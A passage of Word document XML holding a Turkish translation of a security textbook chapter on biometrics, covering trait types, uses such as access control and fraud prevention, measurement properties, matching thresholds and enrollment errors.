        <w:t>Güvenlik uzmanları, kimlik kartları, şifreler, PIN'ler ve akıllı kartlar dahil, kendilerine sunulan çok çeşitli kimlik ve kimlik doğrulama seçeneklerine sahiptir. Öyleyse neden biyometri farklı ve neden çoğu kişi tarafından doğru tanımlama ve doğrulama için “en iyi” yöntem olarak kabul ediliyor?</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cevap, tanımlamanın ve doğrulamanın niteliğinden gelir. Her iki süreç de özgünlük (</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>uniqueness</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) kavramına dayanıyor. İzole edilebilecek ve bu kişiyi pozitif olarak tanımlamak için kullanılabilecek bir kişinin kendine özgü bir yönü olduğunu varsayarlar. Bununla birlikte, mevcut tanımlama ve kimlik doğrulama biçimlerinin hepsi aynı yanlışlıktan muzdariptir: ölçtükleri “benzersiz” özellik bireye yapay olarak bağlanmaktadır. Kullanıcı kimlikleri ve parolalar kullanıcılara atanır ve kullanıcı </w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>tarafından hatırlanması gerekir.</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kimlik rozetleri veya jetonları, daha sonra bulundurmaları gereken kullanıcılara verilir. Sürücü ehliyetleri, pasaportlar veya X.509 genel anahtar sertifikaları gibi sertifika kimlik doğrulama formları, bir kişiye sertifikadaki ad ile sertifikanın adı arasındaki resim veya genel anahtar arasındaki eşleşmeyi onaylayan bir yetkili tarafından atanır. Bunların hiçbiri, adlandırılan bireyi yanlış tanımlamaz veya doğrulamaz. Hepsi bir şekilde ya da başka şekilde kandırılabilir veya “taklit” edilebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008D0E9A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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benzersizlik sorununa farklı bir şekilde yaklaşmaktadır. Özneye yapay olarak bir tür benzersizlik eklemek yerine, özgünlük, özne zaten sahip olduğu içsel bir kalite ile belirlenir. Parmak izleri, retina desenleri, el geometrisi ve DNA gibi özellikler hemen hemen tüm insanların zaten sahip olduğu ve hepsi doğal olarak benzersiz olan bir şeydir. Aynı zamanda, her zaman kişiyle birlikte olan ve böylece gerektiğinde uygun olan bir şeydir. Bir kullanıcı parmağını unutamaz veya sesini evde bırakamaz. Biyometrik özelliklerin benzersiz olmaları da kendine özgü bir güce sahiptir. Bir kişi zayıf bir biyometrik seçemez, zayıf bir şifre veya PIN seçebilir. Çok yüksek güvenlikli uygulamalar veya tanımlama veya doğrulama için son derece yüksek bir güvence seviyesinin gerekli olduğu durumlar için, bu yerleşik benzersizlik, biyometriye geleneksel tanımlama ve onaylama meslektaşları üzerinde ihtiyaç duyduğu üstünlüğü sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008D0E9A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008D0E9A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Biyometri Nasıl Çalışır? (</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cs="TrumpMediaeval-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>How Does Biometrics Work?</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</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arkasındaki fizyoloji oldukça karmaşık olsa da, bir uygulamada biyometrik ölçümlerin kullanılması süreci nispeten basittir. İlk adım, ölçülmesi gereken spesifik biyometrik özelliklerin belirlenmesidir. Bu, katı bir teknoloji sorusundan çok pratiklik, kişisel tercih ve kullanıcı tutumunun bir işlevidir. Uygun bir biyometrik ölçüm seçmeye giren farklı faktörler bu bölümde daha sonra ele alınmaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008D0E9A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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lçülecek olan spesifik özellik belirlendikten sonra, biyometrik bir okuma bazı mekanik veya teknik araçlarla alınır. Özel araçlar seçilen biyometrik özelliğe dayanacaktır, ancak biyometrik okumalar genellikle (1) bir karakteristiğin bir görüntüsünün fotoğraflanması veya taranması veya (2) konunun içindeki karakteristiğin yaşam işaretlerinin ölçülmesi yoluyla alınır.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Okuma alındıktan sonra, daha fazla karşılaştırmayı kolaylaştıran bir forma dönüştürülmesi gerekir. Tüm taranan veya okunan görüntünün binlerce kişi için saklanması büyük miktarda depolama alanı kaplar ve tüm görüntünün karşılaştırma için kullanılması verimsizdir. Gerçekte, görüntünün sadece küçük bir kısmı, doğru karşılaştırma için gerekli olan önemli bilgileri içerir. Bu önemli bitlere eşleşme noktaları denir. Yalnızca eşleşme noktalarını belirleyerek ve toplayarak, biyometrik ölçümler doğru şekilde yapılabilir ve veri depolama gereksinimleri önemli ölçüde azaltıl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Eşleşme noktaları, şablon adı verilen standart bir formatta toplanır. Şablon, sistemde depolanan veya kullanıcılardan toplanan diğer şablonlarla daha fazla karşılaştırma yapmak için kullanılır. Şablonlar, daha sonra alınması ve biyometrik uygulamanın kullandığı veri depolama sisteminde karşılaştırılması için saklanır. Daha sonra, bir kullanıcının tanımlanması veya doğrulanması gerektiğinde, konuyla ilgili başka bir biyometrik okuma alınır. Şablon bu yeni taramadan çıkarılır ve veritabanında depolanan bir veya daha fazla şablonla karşılaştırılır. Eşleşen bir şablonun varlığı veya yokluğu sistem tarafından uygun bir yanıtı tetikleyecekt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zellikler (Biometric Trait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lastRenderedPageBreak/>
        <w:t>Tüm biyometrik sistemler, üç farklı insan özelliği türünden birine dayanmaktadır. Genotipik özellikler, bireyin genetik yapısına göre tanımlananlardır. Genotipik (Genotypic) özelliklerin örnekleri yüz geometrisi, el geometrisi ve DNA kalıplarıdır. Tek yumurta ikizleri veya klonları arasında bulunan genotipik özelliklerin çok benzer olduğunu ve ikisini birbirinden ayırmak için ayırt edici bir özellik olarak kullanmanın zor olduğunu not etmek ilginçt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Randotipik (Randotypic) özellikler, embriyonun gelişmesinde erken oluşan özelliklerdir. İnsanların sahip olduğu vücut özelliklerinin çoğu, bu gelişim aşamasında belirli kalıpları üstlenir ve bu kalıplar tüm popülasyon boyunca rastgele dağıtılır. Bu, çoğaltmayı oldukça olanaksız kılar ve bazı durumlarda imkânsız hale getirir. Randotipik özelliklerin örnekleri parmak izleri, iris düzenleri ve el damar düzenleri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Davranışsal (Behavioral) özellikler, bir kişinin eğitim veya tekrarlanan öğrenme yoluyla geliştirilen özellikleridir. İnsanlar geliştikçe yaşamları boyunca taşıdıkları belirli davranış biçimlerini öğrenirler. İlginçtir ki, davranışsal özellikler, bir kişi tarafından yeniden eğitim veya davranış değişikliği ile değiştirilebilen tek tip biyometrik özelliktir. Davranışsal özelliklere örnek olarak imza dinamikleri ve klavyeyle yazma kalıpları dâhil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 için Ortak Kullanımlar (Common Uses for Biometric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bilimi ve uygulaması hem güvenlik hem de güvenlik dışı amaçlar için çeşitli kullanımlar bulmuştur. Bireylerin kimlik doğrulaması en popüler kullanımlardan biridir. Örneğin, el tarayıcıları yüksek güvenlikli bir binaya erişmeye çalışan kişilerin kimliğini doğrulamak için kullanılabilir. Öznenin alınan biyometrik okuması daha sonra veritabanındaki o kişiye ait tek kayıtla karşılaştırılır. Bu formda kullanıldığında, biyometrik kimlik doğrulama genellikle pozitif eşleştirme veya bire bir eşleme (positive matching or one-to-one matching) olarak adlandırıl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Çok sık olarak, ihtiyaç duyulan tek şey, çok sayıda olası konudan belirli bir konunun temel tanımlanmasıdır. Londra'nın Newham ilçesindeki polis, ilçeden geçen insanların yüzlerini taramak için ilçeye monte edilmiş 140 kameradan oluşan bir sistem kullanıyor. Bu yüzler, herhangi birinin Newham’ın sokaklarında dolaşıp dolaşmadığını görmek için bilinen suçluların bir veritabanıyla karşılaştırıldı. Bu özel kullanımda, biyometrik sistem negatif eşleştirme veya birden çok eşleştirme gerçekleştiriyor. Pozitif eşleştirmede kullanılan tek kayıt aramasının aksine, Newham kameraları tarafından taranan her örnek yüz polis veri tabanındaki tüm kayıtlarla karşılaştırılarak olası bir eşleşme aranıyor. Aslında, sistem belirli bir yüzün veritabanında olmadığını (ve muhtemelen tanımlanmış bir suçlu olmadığını) göstermeye çalışıyo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Sahtekârlık önleme biyometri için başka bir yaygın kullanımdır. Bir kullanıcı bir sisteme erişmek için biyometrik kimlik doğrulaması yaptığında, kullanıcının kimliği daha sonra kullanıcının gerçekleştirdiği her olay, etkinlik ve işlemle ilişkilendirilir. Sahte bir işlem tespit edilirse veya sistem bir soruşturmaya veya denetime tabi tutulursa, yasadışı faaliyete katılımlarını onaylayan veya reddeden bir kullanıcının eylemlerinin denetim izi oluşturulabilir. Sistemi kullanan personel kimlik etiketleme ve denetleme izlerinden haberdar edilirse, biyometri kullanımı sahtekârlığı ve kötüye kullanımı önlemek için caydırıcı ol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Biyometri, temel erişim kontrolü olarak da kullanılabilir. Bireylerin tanımlarını geçmelerine izin verilmeden zorlayarak yüksek güvenlikli bölgelere erişimi kısıtlama mekanizması. Biyometri, genel olarak yalnızca fiziksel güvenlik erişim </w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>kontrolü rolündeki tanımlama için kullanılır. Diğer erişim kontrolü uygulamalarında, biyometri bir kimlik doğrulama mekanizması olarak kullanılır. Örneğin, kullanıcıların gizli veya özel bilgileri görüntülemelerine veya değiştirmelerine izin verilmeden önce kendilerini biyometrik olarak doğrulamaları gerekebilir. Normalde, fiziksel erişim kontrolünde bile, kişinin kendini tanımlayabildiği (ismini belirterek veya bir miktar fiziksel kimlik bilgisi sunarak) ve sistemin hızlı bir şekilde pozitif eşleştirme yapmasını sağladığı zaman bir eşleşme için veritabanında arama yapmak verimli değil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Daha az güvenlik odaklı bir biyometri kullanımı, bir kuruluşun müşteri hizmetlerini iyileştirmektir. Bir süpermarket, ödeme hattındaki müşterileri tanımlamak için yüz tanıma özelliğini kullanabilir. Müşteriler tanımlandıktan sonra, uygun “sık alışveriş yapan” indirimler verilebilir, kredi kartlarını otomatik olarak tahsil ettirebilir ve gelecekte müşterilere daha fazla kişisel hedefli satışlar ve özel ürünler sunmak için alışveriş kalıplarını analiz ettirebilir - hepsi de müşteriye ihtiyaç duymadan Shopper’ın Club kartını gösterin ya da kredi kartını kaydırın. Bu tür bir kullanımın mahremiyet yönünü bir kenara bırakarak (şimdilik), bu kişiselleştirilmiş müşteri hizmetleri uygulaması, oldukça rekabetçi pazarlardaki tüketici odaklı şirketler için çok arzu edile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lçüm Faktörleri (</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cs="TrumpMediaeval-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Biometric Measurement Factors</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</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lçüm, mekanik üreme ve analiz içeren herhangi bir işlemde olduğu gibi, burada sürecin başarısına veya başarısızlığına katkıda bulunan birçok faktör vardır. Bu faktörlerin tümü iki genel kategoriye ayrılır: ölçülen özelliklerin özellikleri ve ölçüm sürecinin özellikleri.</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Karakteristik özellikleri (</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cs="TrumpMediaeval-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Characteristic Properties</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</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ölçüm için belirli bir özelliğin uygun olup olmadığını belirlemek için en önemli gereksinim benzersizliktir (uniqueness). Spesifik özellik, konu popülasyondaki her birey için ölçülebilir şekilde benzersiz olmalıdır. Bunun bir sonucu olarak, karakteristik ölçülen belirli bir kişiye özgü karşılaştırma noktaları üretebilmelidir. Bu benzersiz özellik esastır, çünkü aynı özelliklere sahip iki kişi, bir diğerinin olduğuna inanmak için ölçüm sistemini kandır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rakteristik, ölçülen popülasyondaki tüm bireylerde bulunan evrensel olmalıdır. Bu ilk bakışta kolay olabilir, çünkü herkes parmak izi, herkesin DNA'sı ve herkesin sesi var. Yoksa onlar mı? Bir biyometrik ölçüm sistemi kurarken, güvenlik pratisyenlerinin, ölçülen popülasyonun belirli bir özelliği olmayan bir bölümünün olacağı gerçeğini göz önünde bulundurmaları gerekir. Örneğin, insanlar kazalara ve hastalıklara karşı parmaklarını kaybederler ve bazı insanlar konuşamaz. Bu insanlar için, parmak izi analizi veya ses tanıma, geçerli bir biyometrik mekanizma olarak çalışmaz. Belirli bir popülasyondaki bu niteliklere sahip olmayan insan sayısı çok azsa, bu vakalarla başa çıkmak için alternatif prosedürler ayarlanabilir. Sayı göreceli olarak büyükse, alternatif bir biyometrik yöntem veya hatta tamamen farklı bir güvenlik mekanizması dikkate alınmalıd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Evrensellik konusunda belirli bir biyometrik düşünülürken, güvenlik pratisyeni ayrıca kültürel düşünceleri de dikkate almalıdır. Belirli bir hedef popülasyona göre ayarlanmış bir ölçüm sistemi diğer ırk, etnik veya cinsiyet gruplarıyla iyi performans göstermeyebilir. Örneğin, bir şirketin doğru bir sesli yazı almak için kullanıcıların birkaç standart kelime konuşmasını gerektiren bir ses tanıma sistemi kullandığını varsayalım. Sistem, New York'lular (sistemin kullanıldığı yerlerde) tarafından konuşulan kelimeleri açıkça anlayacak şekilde ayarlanmışsa, bölgeye aktarılan derin bir Güney Amerika aksanı olan bir çalışan, standart kelimeleri söylerken tanınmakta zorluk çekebilir. Benzer şekilde, bazı kültürlerde </w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>nesnelerin dokunma ile ilgili gelenekleri ve aynı cihazın (el tarayıcı veya parmak izi okuyucusu gibi) paylaşılan kullanımına ilişkin sağlık endişeleri vardır. Kullanıcının okuma cihazıyla temas etmesini veya fiziksel olarak etkileşmesini gerektiren bir biyometrik sistem kurarken, bu tür hususların ele alınması gerek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bir özellik için bir diğer önemli özellik ise kalıcılıktır. Karakteristik, bireyin kalıcı bir parçası olmalı ve birey, ağır kişisel zarar veya tehlikeye neden olmadan, karakteristiği çıkaramaz veya değiştiremez. Bu kalıcılık özelliği zaman içinde de geçerlidir. Karakteristik zaman içinde önemli ölçüde değişmemelidir, aksi halde desen eşleşmesini yanlış hale getirir. Bu yönün birkaç ilginç sonuçları vardır. Örneğin, küçük çocukların fizyolojisi büyüme yıllarında oldukça hızlı bir şekilde değişmektedir, bu nedenle küçükken ölçülen ses veya yüz özellikleri sadece birkaç yıl sonra geçersiz olabilir. Aynı şekilde, fiziksel özellikleri ameliyat veya kaza sonucu yaralanma sonucu hasar görmüş olan yaşlı insanlar da iyileşmek için alışılmadık derecede uzun zaman alabilir, bu da herhangi bir fiziksel ölçümü en azından bir süre için yanlış yapar. Hamilelik, kadının gözünün arkasındaki kan damarlarının değişmesine neden olur, böylece retina taraması kullanılıyorsa yeniden kayıt yapılması gerekir. Son olarak, el yazısı imza kalıpları, insanlar yaşlandıkça veya düzenli olarak imzalamaları gereken belge sayısıyla ilişkili olarak zaman içinde değişir. Bu durumlar, biyometrik sistemin parçası üzerinde daha fazla sayıda yanlış reddedilmeye yol açacaktır. Bu tür sorunlardan kaçınmak için, sistemdeki her birey için periyodik olarak temel bir ölçüm yapmak yeniden avantajlı ol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lıcılığa ek olarak, karakteristik değiştirilemez olmalıdır. Bir kişinin biyometrik sistemde bir hata durumuna neden olmadan veya konuyla ilgili zarar veya risk sunmadan karakteristiği değiştirmesi mümkün olmamalıdır. Örneğin, bir kişinin DNA'sını değiştirmek mümkün değildir. Ve birine yeni parmak izlerini vermek (teorik olarak mümkün olsa da (deri grefti veya rakam nakli yoluyla) mümkün olsa da, çoğu insan çoğu uygulama için güçlü bir tehdit olarak değerlendirilemeyecek kadar aşırı ve tehlikeli olduğunu düşünü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zelliğin bir tür kayıt cihazı tarafından yakalanması veya başka şekilde tanınması kabiliyetine sahip olması önemlidir. Bu özellik, bu özelliği (ve eşleşme noktalarını) insan veya teknik araçlarla okunabilir ve anlaşılabilir bir forma dönüştürebilen standart (belki de uzmanlaşmış) bir giriş cihazı ile ölçülebilir olmalıd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Herhangi bir biyometrik özelliğin nihai önemli özelliği, doğrulanabilmesidir. Bir bireyin özelliği, diğer konularda bulunan benzer özelliklerle eşleştirilebilmeli ve sunulan ölçüm ve eşleşme puanlarına dayanarak kesin bir pozitif veya negatif eşleşme sağlanabilmeli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Ölçüm Özellikleri (Measurement Propertie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nceki bölüm, biyometride kullanılan çeşitli biyolojik özelliklerin özelliklerini ele alıyordu. Bununla birlikte, bir biyometrik sistemin başarısının veya başarısızlığının büyük bir kısmı ölçüm ve analiz sürecinde yatmaktadır. Sürecin en önemli yönlerinden biri doğruluktur. Herhangi bir izleme veya gözetim sisteminde olduğu gibi, biyometrik sistemin doğru ölçümler alması ve söz konusu özelliğin doğru bir gösterimini yaratması kritik önem taşır. Benzer şekilde, sistemin ölçümden ürettiği şablon, söz konusu karakteristiği doğru bir şekilde göstermeli ve sistemin diğer şablonlarla doğru karşılaştırmalar yapmasına izin vermeli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lastRenderedPageBreak/>
        <w:t>Sistemin şablon üretme ve bu şablonları daha sonra değerlendirmede kullanma yeteneği zaman içinde tutarlı olmalıdır. Ölçüm işlemi, karakteristiği belirsiz bir süre boyunca (zorunlu olarak zorunlu olmasa da) kesin bir şekilde ölçebilmeli ve değerlendirebilmelidir. Örneğin, bir çalışan işin ilk gününde yüz tarama sistemine kaydolduysa, bu tarama sistemi bu çalışanı tüm çalışma süresi boyunca doğru bir şekilde (yaşlanmanın, yüz kıllarının uzaması, büyümesi veya çıkarılması ve hatta zaman zaman kırılan burun oluşumu gibi) doğrulayabilmelid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sistemler, insan özelliklerinin incelemelerine dayandığından, sadece karakteristiğin özelliklerini veya eşleşme noktalarını kontrol etmenin aksine, sistemin karakteristiğin kaynağını doğrulaması önemlidir. Örneğin, sistem yüz geometrisini ölçüyorsa, konunun yüzünü fotoğraf makinesine doğru tutarak görüntünün gerçek bir kişiden olduğuna inanmak için onu kandırabilir mi? Bir parmak izi sistemi kullanılıyorsa, sistem parmağın canlı bir insana takılı olup olmadığını kontrol eder mi? (Bu, sanıldığı kadar zor değildir!) Vücut ısısı, kan akışı, hareket ve ses tonlaması gibi özelliklerin kontrol edilmesi, sistemin gerçek ürün ile mekanik bir üreme arasında ayrım yapmasına yardımcı ol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Son olarak, ölçüm sistemi, biyometrik okumaların doğruluğuna etki edebilecek çevresel faktörlerin etkisini azaltmaya çalışmalıdır. Bunun bir örneği, yüz tarayıcılarının doğru yerleştirilmesi olabilir, böylece güneş ışığı veya parlama kameraları etkilemez. Parmak izi sistemleri, baskı okuyucunun lekelenmemesini veya kirlenmemesini sağlamak için mekanizmalar kullanmalı, böylece doğru ölçümler yapabilme yeteneğini etkilemelidir. Sesli eşleştirme sisteminin doğruluğu, kalabalık veya gürültülü bir kamu ortamında çalıştırılması durumunda tehlikeye girebilir. Tüm bu faktörler başarılı bir biyometrik operasyona karşı çalışır ve planlama aşamalarının başında herkes göz önünde bulundurulmalı ve ele alınmalıd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lçüm (</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cs="TrumpMediaeval-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Biometric Measurement</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</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Her ne kadar biyometri arkasındaki bilim ve teknoloji son yıllarda büyük ölçüde iyileşmiş olsa da, kusursuz değildir. Biyometrik cihazlar tarafından alınan ölçümlerin ve biyometrik özellikler arasında yapılan karşılaştırmaların kesin, yüzde 100 hatasız doğruluğu ne gerçekçidir ne de beklenemez. Bu nedenle, bir biyometrik sistemin uygulayıcılarının teknolojinin sınırlarını anlamaları ve olası hataya neden olabilecek durumları azaltmak için uygun adımları atmaları gerekir. Biyometrik sistemler, tüm güvenlik sistemleri gibi, kurulumun özel ihtiyaçlarına bağlı olarak “ayarlanmalıdır” ve kullanım ve çalışma ortamındaki gerçek dünyadaki farklılıkları hesaba katmalıd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Default="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>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Ölçüm özellikleri (Measurement Characteristic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Benzer olup olmadıklarını (ve benzerliğin ne kadar uzadığını) belirlemek için biyometrik şablonları karşılaştırma işlemine eşleştirme denir. Eşleştirme işlemi, sunulan şablonun veri tabanında bulunan bir şablonla ne kadar iyi (veya ne kadar zayıf) karşılaştırıldığını gösteren bir skorla sonuçlanır. Her biyometrik sistem için, sistemin “başarılı” bir sonuç vermesi için karşılanması gereken özel bir eşik vardır. </w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bu eşleşme için üretilen </w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>puan eşiğin üstüne düşerse, şablon kabul edilir. Puan eşiğin altına düşerse, şablon reddedilir. Eşik değeri tipik olarak sistemin yöneticileri veya operatörleri tarafından ayarlanır ve operatörün istediği hassasiyet derecesine bağlı olarak ayarlana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İronik olarak, bir kullanıcı tarafından normal sistem kullanımı sırasında üretilen şablon ve bu kullanıcı için sistemde depolanan şablon nadiren tamamen aynı bir eşleşmeyle sonuçlanmalıdır. Biyometrik sistemlerde kullanıcı “oturumları” </w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>arasında her zaman bir miktar değişiklik (ancak küçük) vardır ve bu değişiklik dereceleri sistemin genel eşik ayarında dikkate alınmalıdır. Sunulan bir şablon ile depolanan arasında tamamen aynı bir eşleşmenin tespiti Şablon (örneğin, bir davetsiz misafir okuyucu çıktısının dijitalleştirilmiş bir kopyasını alırsa ve ardından kopyayı eşleştirme işlemine besleyerek okuyucuyu atlarsa) kurcalamanın veya mekanik olarak çoğaltılan biyometrik özelliklerin kullanılmasının bir göstergesi olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008D0E9A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008D0E9A" w:rsidRDefault="00E77DF4" w:rsidP="00E77D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Hata Yapan Faktörler (Error-Producing Factor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aşlangıçta bir kişinin özelliklerini ölçme, bir şablon oluşturma ve bu şablonu bir sistemde saklama işlemine kayıt denir. Kayıt sürecinde, sistem konunun biyometrik özelliğini “öğrenir”. Bu öğrenme süreci, farklı koşullar altında karakteristiğin çeşitli okumalarını içerebilir. Sistem konuyla daha fazla tecrübe kazandıkça, karakteristiğin sunulabileceği çeşitli yolları öğrenir ve bu kullanıcı için depolanan şablonu iyileştirir. Ardından, gerçek işlem sırasında bu bilgiyi, karakteristiğin sunulma şeklindeki varyasyonları hesaba katmak için kullan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yıt sürecinin performansının sistemin genel doğruluğu üzerinde büyük etkisi olabilir. Kayıt işleminin yalnızca ideal koşullar altında (örneğin, iyi ışıklandırılmış sessiz bir odada) değil, aynı zamanda en uygun koşulların altında (örneğin, arka plan gürültüsü veya düşük ışıklandırma) altında yapılması hayati önem taşır. İyi yapılmış bir kayıt, normal kullanım sırasında sistem tarafından yapılan karşılaştırmaların doğruluğunu arttırır ve yanlış okuma olasılığını büyük ölçüde azaltır. Kayıt işleminde hatalar ortaya çıkarsa, kullanıcının daha sonraki sistem işlemleri sırasında kullanıcının doğrulanmasında hatalara neden olabilir veya aşırı koşullarda, bir sahtekârın sistem tarafından kabul edilmesine izin vere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bir sisteme girilen hataların tümü mekanik arızalardan veya teknik 